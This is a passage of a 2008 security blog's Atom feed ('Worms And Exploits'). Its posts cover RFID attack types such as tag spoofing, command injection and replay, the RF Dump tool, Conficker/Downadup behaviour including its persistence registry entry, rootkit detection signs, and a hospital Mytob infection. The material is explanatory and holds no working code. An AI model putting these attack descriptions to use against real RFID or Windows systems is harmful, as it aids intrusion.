&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;a href="http://networks.silicon.com/lans/0,39024663,39164446,00.htm"&gt;&lt;span style=""&gt;http://networks.silicon.com/lans/0,39024663,39164446,00.htm&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Typically RFID uses these bands of frequency for communication, &lt;/span&gt;Low Frequency (LF) at 125 kHz to 134 kHz, High Frequency (HF) at 13.56 MHz, and Ultra HF at 860 to 930 MHz..&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;Now lets talk about some security aspects related to it. There can be multiple types of attacks at different levels of RFID implementation.&lt;/span&gt;&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;Like there can be radio manipulation of radio frequency, which can be done by wrapping the RFID tag with some metal which blocks Radio Frequency, such as aluminum. This wrapping can stop the reader from reading the tag. There can be spoofing attacks against the RFID where the a attackers system is broadcasting incorrect product code over the air instead of a valid one. Even at time attackers can air the system commands as there may be less validations put for input parameters considering that there will be always a valid data input in a particular area. This is like a SQL injection in a web based scenario where an attacker injects a SQL command through URL to the Database, similarly the attacker can carry a tag containing a system command instead of a valid data. The another innovative approach is to intercept and record the valid RFID signal and then play it back to the reader, the reader thinks it correct and accepts it.&lt;/span&gt;&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;  &lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;In 2004, Lukas Grunwald had written called RF Dump in Java language. The program scans for RFID tags via an ACG brand reader attached to the serial port of a computer. When the reader recognizes a card, the program presents the card data in a spreadsheet-like format on the screen. The user can then enter or change data and reflect those changes on the tag. RF Dump also makes sure that the data written is the correct length for the tag's fields, by either padding zeros or truncating extra digits as needed.&lt;/span&gt;&lt;/p&gt;&lt;p class="Default" style="text-align: justify;"&gt;&lt;br&gt;&lt;/p&gt;&lt;p class="Default" style="text-align: justify;"&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Font Definitions */  @font-face 	{font-family:&amp;quot;Cambria Math&amp;quot;; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;} @font-face 	{font-family:Tahoma; 	panose-1:2 11 6 4 3 5 4 4 2 4; 	mso-font-alt:Tahoma; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:&amp;quot;&amp;quot;; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} p.Default, li.Default, div.Default 	{mso-style-name:Default; 	mso-style-unhide:no; 	mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	mso-layout-grid-align:none; 	text-autospace:none; 	font-size:12.0pt; 	font-family:&amp;quot;Tahoma&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	color:black;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&amp;gt; &lt;/style&gt;  &lt;/p&gt;&lt;p class="Default" style="text-align: justify;"&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;I feel there is still lots of things to say about RFID and things related to it, which I will cover in some later posts.&lt;/span&gt;&lt;/p&gt;  &lt;br&gt;&lt;span style="font-size: 11pt; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: windowtext;"&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-1277856944976850524?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/1277856944976850524/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=1277856944976850524' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1277856944976850524'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1277856944976850524'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/radio-frequency-identification-rfid.html' title='Radio Frequency Identification (RFID)'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5907334708589435791</id><published>2008-12-02T00:24:00.001-08:00</published><updated>2008-12-02T00:24:07.960-08:00</updated><title type='text'>New Malware Analysis Partner</title><content type='html'>Hi All readers&lt;br&gt;&lt;br&gt;I am glad to announce that today &lt;a href="http://malwareinfo.org"&gt;http://malwareinfo.org&lt;/a&gt; and W&amp;amp;E become partners for Malware analysis.&lt;br&gt;&lt;br&gt;W&amp;amp;E&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5907334708589435791?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5907334708589435791/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5907334708589435791' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5907334708589435791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5907334708589435791'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/new-malware-analysis-partner.html' title='New Malware Analysis Partner'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8035231112968712546</id><published>2008-11-30T12:47:00.001-08:00</published><updated>2008-11-30T12:47:28.551-08:00</updated><title type='text'>Hi Readers Keep reading...</title><content type='html'>Hi&lt;br&gt;&lt;br&gt;Thanks for keeping an eye on my blog, I am working on bringing you all a new blog on a very special Technology and its security aspects, Mostly by another day or two.&lt;br&gt;&lt;br&gt;Thanks all readers&lt;br&gt;W&amp;amp;E...&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8035231112968712546?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8035231112968712546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8035231112968712546' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8035231112968712546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8035231112968712546'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/hi-readers-keep-reading.html' title='Hi Readers Keep reading...'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-4869695553169017277</id><published>2008-11-25T21:48:00.001-08:00</published><updated>2008-12-31T01:11:55.633-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='ms exploit 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><title type='text'>New Worm Attack Nov 2008: Exploting (Microsoft MS-08067)SRVSVC RPC, Remote Code Execution</title><content type='html'>&lt;span style=";font-family:Arial;font-size:10;"  &gt;Hi all i was just going through the internet for some info on new worms or attacks if any, Guess what, I found a new worm which is exploiting the Exploting &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Microsoft+SRVSVC+RPC&amp;amp;sa=Search"&gt;Microsoft SRVSVC RPC&lt;/a&gt; by Remote Code Execution using vulnerability &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=MS-08-067&amp;amp;sa=Search"&gt;MS-08-067&lt;/a&gt; to propagate and exploit machines in a new way, the worm names are &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Win32/Conficker.A+%28CA%29&amp;amp;sa=Search"&gt;Win32/Conficker.A (CA)&lt;/a&gt;, and &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=W32.Downadup+%28Symantec%29&amp;amp;sa=Search"&gt;W32.Downadup (Symantec)&lt;/a&gt;, Symantec was the first to discover this worm.&lt;br /&gt;&lt;br /&gt;So what it does?&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt; As far as i read and understood,&lt;/span&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;It once executed by various means from the attacker it creates a DLL fine in %system%, and deletes user created system restore points, and then it checks if the machine is WIN 2K, and if the machine is WIN2K then it injects a mallicious code in "Services.exe" process. What if the OS is not a WIN2K ? Well in that case it creates a Service with name "Netsvcs" with parameters " %System%\svchost.exe -k netsvcs " and adds a registry entry &lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;HKLM\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\ServiceDll = "%System%\&amp;lt;random worm file name&amp;gt;.dll"&lt;br /&gt;&lt;br /&gt;The worm has a unique speciality, which makes it propagate and infect the other machine faster is that, it connects to &lt;a href="http://getmyip.org/"&gt;getmyip.org&lt;/a&gt; so that it can get the public IP address of the compromised computer, WOW!, then the worm downloads a mallicious file from its master's webserver (I call it like that way), and executes it to create web server on the compromised machine with some random port, and after that it passess this new URL to other computers and if they get infected then they will download the worm from the new URL of previously infected computer. So the attacker can now sleep tight and shutdown his server as its now self propagating.&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For further information and mitigation i will suggest the users to follow the vendor sites in links.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Reference used:&lt;/span&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;&lt;a href="http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=75911"&gt;http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=75911&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-112203-2408-99&amp;amp;tabid=1"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-112203-2408-99&amp;amp;tabid=1&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx&lt;/a&gt;&lt;br /&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-4869695553169017277?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/4869695553169017277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=4869695553169017277' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/4869695553169017277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/4869695553169017277'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/new-worm-attack-nov-2008-exploting.html' title='New Worm Attack Nov 2008: Exploting (Microsoft MS-08067)SRVSVC RPC, Remote Code Execution'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6757372318227677</id><published>2008-11-24T05:13:00.001-08:00</published><updated>2008-11-24T05:13:45.679-08:00</updated><title type='text'>Some Delay in next blog...</title><content type='html'>Hi Readers,&lt;br&gt;&lt;br&gt;I am a bit stuck with researching a new good topic for you all, kindly expect 2-3 days delay in my next blog, kindly revisit in 3 days for an exciting blog on a latest technology which is used by most of the retail industry today and other domains of the industry too but they are facing security challenges to scale that technology up. I will bringing you all about that technology in 3 days.&lt;br&gt; &lt;br&gt;Thanks&lt;br&gt;W&amp;amp;E---&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6757372318227677?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6757372318227677/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6757372318227677' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6757372318227677'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6757372318227677'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/some-delay-in-next-blog.html' title='Some Delay in next blog...'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-3179334473216564698</id><published>2008-11-21T06:23:00.001-08:00</published><updated>2008-11-21T06:25:58.753-08:00</updated><title type='text'>Few Facts about RootKits....</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;As per Wikipedia is "&lt;/span&gt;A &lt;b&gt;rootkit&lt;/b&gt; is malware which consists of a program (or combination of several programs) designed to take fundamental control (in Unix terms "root" access, in Windows terms, "Administrator" or "Admin" access) of a computer system, without authorization by the system's owners and legitimate managers.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;So now by that definition we all know that a Rootkit is a program which takes control of the admin users of a operating system and by doing that it takes control of the whole system and will be capable of doing anything and everything the rootkit wants technically.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;Here I will be discussing about some basic facts and behavior about the rootkits.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;As far as the rootkits are concerned, they mainly have two important functions which makes them unique. One is the Command and control which means the attacker can control the rootkit from a remote location and issue commands to it for several functions to perform on the victim's machine. The other function is to maintain access and listening to the victims computer for different activities on the computer of the victim, like capturing the keystrokes, peeping through the emails, network packet captures, keeping an eye on the encrypted traffic for the encryption keys and various other things. Rootkits are basically initiated by user intervention without knowing what exactly he is doing, like he may be opening a mail and that mail has a embedded HTML link which takes him to a malicious location from where the malware is downloaded and installed, once installed the rootkit program loads itself to the memory. It can even spread via malicious attachments. The rootkits looks for software glitches and holes which it can modify and keep working in stealth mode, like say if there is any glitch available in any DLL or exe file of a software then it will try to modify it in the form of software patch and then it will perform its designated functions, Sometimes the rootkits also modify some programs and they infect it with spyware. And eventually they start pushing a lots of other unwanted stuff into the infected computer.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&lt;span style=""&gt;            &lt;/span&gt;So Guys I enough talked about what a rootkit is, its time to talk about how many types and variants are there in the wild. Well there are almost five types of rootkits known till now, namely Firmware type, which stays hidden in the source code and hard to detect, this was proved by John Heasman in ACPI and PCI expansion. The next is virtualized type, these work by modifying the systems boot sequence and is cap&lt;/span&gt;able to intercept all hardware calls from the guest operating system as it loads the original operating system as Virtual Machine. The third type is &lt;span style=""&gt;Kernel Level type which actually sit in the system by modifying some part of the Kernel code and is very notorious and hard to detect, Application and Library Level types are the ones who actually get in to the system by modifying the actual software code by means of patch, or hooking to the software function calls or even at times changing the actual binary itself with the infected one.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&lt;span style=""&gt;            &lt;/span&gt;Well now I hope everyone has a fair idea what a rootkit is, how it works and the various types of it. So now lets say someone is infected with, sorry I am wrong, lets say is "rooted" with a rootkit, then in that case how do you detect it on your system. The fun is that the rootkits are designed to be stealthy so its going to be a challenge for everyone to detect it, but there are some basic things what we can do, which is like if your system is taking a long time to boot, or say it crashes too frequently with blue screen of death, look for the MsConfig, see if you can see something which is not supposed to be at the startup process and does not belong to the system process, or there may be processes running in the TaskManager which you don't know. The basic system settings are disabled suddenly like you are having no access to TaskManager, MSConfig or even RegEdit and at times the combination of all three of these controls. Hard drives is busy most of the times and you can see the HDD light blinking all the times even if the system is idle, your browser takes you to pages where you are not intended to go or it launches automatically without your intervention and intention to go there, sometimes you see requests made by some processes from your system to access internet and you don't know the process or it does not looks like legitimate, there are some funny looking icons on the task bar and you cannot remove them and they keep on bugging you with irritating messages and balloon alerts from the task bar. And at times you also get some funny messages flashing on your screen too. I hope I made my point and gave lots of examples to understand and there are still plenty available.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&lt;span style=""&gt;            &lt;/span&gt;Now I believe you all must be anxious to know some names for rootkits, well I cannot publish the names here just to keep the blog clean, but certainly let you know some famous ones, which are &lt;/span&gt;Trojan.Vundo, Trojan.Trojan:Win32/Virtumonde.R, W32/Trojan2.TDQ, Win32/Vundo.LV, Trojan.AdWare.Win32.SuperJuan.bh, these are only to name a few.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Last but not the least, how to remove it, well almost all major antivirus engines catch them and remove them, and people can visit the following site for a list of available tools and names for rootkits.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=http://www.antirootkit.com/rootkit-list.htm&amp;amp;sa=Search"&gt;http://www.antirootkit.com/rootkit-list.htm&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;     &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;References:&lt;/span&gt;&lt;/p&gt;              &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=http://www.informit.com/articles/article.aspx?p=408884&amp;amp;seqNum=5&amp;amp;sa=Search"&gt;http://www.informit.com/articles/article.aspx?p=408884&amp;amp;seqNum=5&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=http://resources.zdnet.co.uk/articles/0,1000001991,39523773,00.htm&amp;amp;sa=Search"&gt;http://resources.zdnet.co.uk/articles/0,1000001991,39523773,00.htm&lt;/a&gt;&lt;br /&gt;&lt;a href="http://tinyurl.com/googleBookRootkit"&gt;http://tinyurl.com/googleBookRootkit&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=http://www.5starsupport.com/tutorial/rootkits.htm&amp;amp;sa=Search"&gt;http://www.5starsupport.com/tutorial/rootkits.htm&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=http://www.rootkitonline.com/types-of-rootkits.html&amp;amp;sa=Search"&gt;http://www.rootkitonline.com/types-of-rootkits.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://tinyurl.com/DetectRootKitHowTo"&gt;http://tinyurl.com/DetectRootKitHowTo&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-3179334473216564698?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/3179334473216564698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=3179334473216564698' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3179334473216564698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3179334473216564698'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/few-facts-about-rootkits.html' title='Few Facts about RootKits....'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6296040602589768932</id><published>2008-11-19T02:07:00.001-08:00</published><updated>2008-11-19T02:07:09.707-08:00</updated><title type='text'>Three London hospitals is Hit by Computer virus</title><content type='html'>Today when I was going through the news sites, I read about a virus which has effected 3 London Hospitals to shutdown completely for more than 24 hours. This has happened in past 2 days. The news agencies has reported that &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Sir%20Bartholomew%E2%80%99s+%28Barts%29&amp;amp;sa=Search"&gt;Sir Bartholomew's (Barts)&lt;/a&gt; in the City, &lt;span style="font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;the &lt;a href="goog_1227078964535"&gt;Royal&lt;/a&gt;&lt;/span&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Royal+London+Hospital+in+Whitechapel&amp;amp;sa=Search"&gt;&lt;span style="font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;"&gt; London Hospital in Whitechapel&lt;/span&gt;&lt;/a&gt; and the &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=London+Chest+Hospital+in+Bethnal+Green&amp;amp;sa=Search"&gt;London Chest Hospital in Bethnal Green&lt;/a&gt;, were forced to shut down their systems. The impact is such bad that the Doctors are using pen and paper as backups as a result of the infection.  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;According to &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Sophos&amp;amp;sa=Search" target="_blank"&gt;Sophos&lt;/a&gt;, the hospitals were infected by a variant of the &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Mytob+worm&amp;amp;sa=Search"&gt;Mytob worm&lt;/a&gt;. 